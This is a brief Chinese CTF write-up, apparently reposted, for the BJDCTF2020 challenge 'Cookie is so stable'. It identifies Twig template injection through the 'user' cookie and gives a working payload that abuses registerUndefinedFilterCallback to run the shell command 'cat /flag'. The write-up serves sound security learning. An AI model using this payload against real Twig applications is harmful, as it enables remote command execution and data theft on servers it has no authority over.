[BJDCTF2020]Cookie is so stable - 走看看

zoukankan html css js c++ java

[BJDCTF2020]Cookie is so stable
0x00 知识点

Twig模板注入
链接：

https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig

0x01 解题

测试一下发现*wig模板注入

找注入点：
根据提示，cookie中的user是注入点

payload:
```
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
```
查看全文

相关阅读:
POJ3297+map字符串处理
 POJ3204+DInic+maxflow
HDU4704+费马小定理
 FZU-1924+判断环/DFS/BFS
FZU-1921+线段树
 FZU-1926+KMP
CodeForce 339:A+B+C
HDU2896+AC自动机
 POJ2527+多项式除法
 鼠标移入移出事件

原文地址：https://www.cnblogs.com/wangtanzhi/p/12330542.html

Copyright © 2011-2022 走看看